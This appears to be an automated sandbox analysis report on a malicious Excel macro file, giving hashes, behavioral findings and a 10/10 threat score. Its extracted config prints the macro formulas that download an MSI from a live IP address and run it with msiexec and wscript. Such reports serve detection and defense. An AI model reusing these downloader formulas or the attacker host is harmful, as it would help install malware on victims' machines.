General
-
Target
7395615d46a795b61c1ef4b0104ab4c4
-
Size
6KB
-
Sample
231222-gn21saabfm
-
MD5
7395615d46a795b61c1ef4b0104ab4c4
-
SHA1
43d91072f07b040d96aa69deb7e5b19c8f5c4b39
-
SHA256
66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb
-
SHA512
85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c
-
SSDEEP
192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs
Static task
static1
Behavioral task
behavioral1
Sample
7395615d46a795b61c1ef4b0104ab4c4.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7395615d46a795b61c1ef4b0104ab4c4.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()
Extracted
http://46.17.98.187
Targets
-
-
Target
7395615d46a795b61c1ef4b0104ab4c4
-
Size
6KB
-
MD5
7395615d46a795b61c1ef4b0104ab4c4
-
SHA1
43d91072f07b040d96aa69deb7e5b19c8f5c4b39
-
SHA256
66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb
-
SHA512
85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c
-
SSDEEP
192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-